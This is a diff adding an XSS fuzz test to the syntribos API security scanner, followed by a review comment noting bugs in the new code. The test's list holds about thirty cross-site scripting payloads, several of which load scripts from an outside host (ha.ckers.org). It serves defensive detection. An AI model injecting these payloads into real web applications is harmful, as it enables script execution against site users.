-rw-r--r--syntribos/tests/fuzz/xml_external.py2
-rw-r--r--syntribos/tests/fuzz/xss.py82
2 files changed, 83 insertions, 1 deletions
diff --git a/syntribos/tests/fuzz/xml_external.py b/syntribos/tests/fuzz/xml_external.py
index 6eb8886..b4dd18c 100644
--- a/syntribos/tests/fuzz/xml_external.py
+++ b/syntribos/tests/fuzz/xml_external.py
@@ -49,7 +49,7 @@ class XMLExternalEntityBody(base_fuzz.BaseFuzzTestCase):
49 text=("A string known to be commonly returned after a " 49 text=("A string known to be commonly returned after a "
50 "successful XML external entity attack was included " 50 "successful XML external entity attack was included "
51 "in the response. This could indicate a " 51 "in the response. This could indicate a "
52 "vulnerability to XML entity attacks attacks."), 52 "vulnerability to XML entity attacks."),
53 assertions=self.data_driven_failure_cases())) 53 assertions=self.data_driven_failure_cases()))
54 self.test_issues() 54 self.test_issues()
55 55
diff --git a/syntribos/tests/fuzz/xss.py b/syntribos/tests/fuzz/xss.py
new file mode 100644
index 0000000..b05b85c
--- /dev/null
+++ b/syntribos/tests/fuzz/xss.py
@@ -0,0 +1,82 @@
1"""
2Copyright 2016 Rackspace
3
4Licensed under the Apache License, Version 2.0 (the "License");
5you may not use this file except in compliance with the License.
6You may obtain a copy of the License at
7
8 http://www.apache.org/licenses/LICENSE-2.0
9
10Unless required by applicable law or agreed to in writing, software
11distributed under the License is distributed on an "AS IS" BASIS,
12WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13See the License for the specific language governing permissions and
14limitations under the License.
15"""
16
17from syntribos.issue import Issue
18from syntribos.tests.fuzz import base_fuzz
19
20
21class XSSBody(base_fuzz.BaseFuzzTestCase):
22 test_name = "XSS_BODY"
23 test_type = "data"
24 data_key = "xss.txt"
25 failure_keys = [
26 """<SCRIPT>alert('XSS');</SCRIPT>""",
27 """<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
28 """<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
29 """<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
30 """<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
31 """<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
32 """<IMG SRC="javascript:alert('XSS');">""",
33 """<IMG SRC=javascript:alert('XSS')>""",
34 """<IMG SRC=JaVaScRiPt:alert('XSS')>""",
35 """<IMG SRC=javascript:alert(&quot;XSS&quot;)>""",
36 """<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>""",
37 """<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>""",
38 """<IMG DYNSRC="javascript:alert('XSS')">""",
39 """<IMG LOWSRC="javascript:alert('XSS')">""",
40 """<DIV STYLE="background-image: url(javascript:alert('XSS'))">""",
41 """<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">""",
42 """<DIV STYLE="width: expression(alert('XSS'));">""",
43 """<META HTTP-EQUIV="refresh"
44 CONTENT="0;url=javascript:alert('XSS');">""",
45 """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,
46 PHNjcmlwdD5hbGVydCgnWFNJyk8L3NjcmlwdD4K">""",
47 """<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>;
48 REL=stylesheet">""",
49 """<META HTTP-EQUIV="refresh" CONTENT="0;
50 URL=http://;URL=javascript:alert('XSS');">""",
51 """<STYLE TYPE="text/javascript">alert('XSS');</STYLE>""",
52 """<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>
53 <A CLASS=XSS></A>""",
54 """<STYLE type="text/css">
55 BODY{background:url("javascript:alert('XSS')")}</STYLE>""",
56 """<BASE HREF="javascript:alert('XSS');//">""",
57 """<OBJECT TYPE="text/x-scriptlet"
58 DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>""",
59 """<OBJECT classid=clsid:ae24fdae-03c6-8b6-80c44f3>
60 <param name=url value=javascript:alert('XSS')></OBJECT>""",
61 """<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>"""]
62
63 def data_driven_failure_cases(self):
64 failure_assertions = []
65 if self.failure_keys is None:
66 return []
67 for line in self.failure_keys:
68 failure_assertions.append((self.assertNotIn,
69 line, self.resp.content))
70 return failure_assertions
71
72 def test_case(self):
73 if 'html' in self.resp.headers:
74 self.register_issue(
75 Issue(test="xss_strings",
76 severity="High",
77 text=("A string known to be commonly returned after a "
78 "successful XSS attack was included "
79 "in the response. This could indicate a "
80 "XSS vulnerability"),
81 assertions=self.data_driven_failure_cases()))
82 self.test_issues()
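Review bot: The gate `if 'html' in self.resp.headers:` in test_case checks for a header *named* "html" rather than for an HTML content type, so if resp.headers is the usual header mapping the Issue is never registered for HTML responses; the check should read the content-type value, e.g. `content_type = self.resp.headers.get("content-type", "")` / `if "html" in content_type.lower():`. Several failure_keys entries (new-side lines 43–60) are triple-quoted across two source lines, so each key carries the newline and the continuation-line indentation and can only match a response body that reproduces that exact whitespace; writing them as implicit concatenations of single-line strings, as the Issue text below already does, keeps the intended payload intact. In data_driven_failure_cases the `failure_keys is None` guard sits after the list is created, and the loop could be `return [(self.assertNotIn, line, self.resp.content) for line in self.failure_keys]` once the guard comes first; a method of the same name is called from xml_external.py above, so it may belong on the base class rather than being repeated per test. XSSBody has no docstring; a one-liner such as `"""Flag known XSS payload strings that are echoed back in the response body."""` would help, and the Issue text would read better as "an XSS vulnerability." with a terminal period.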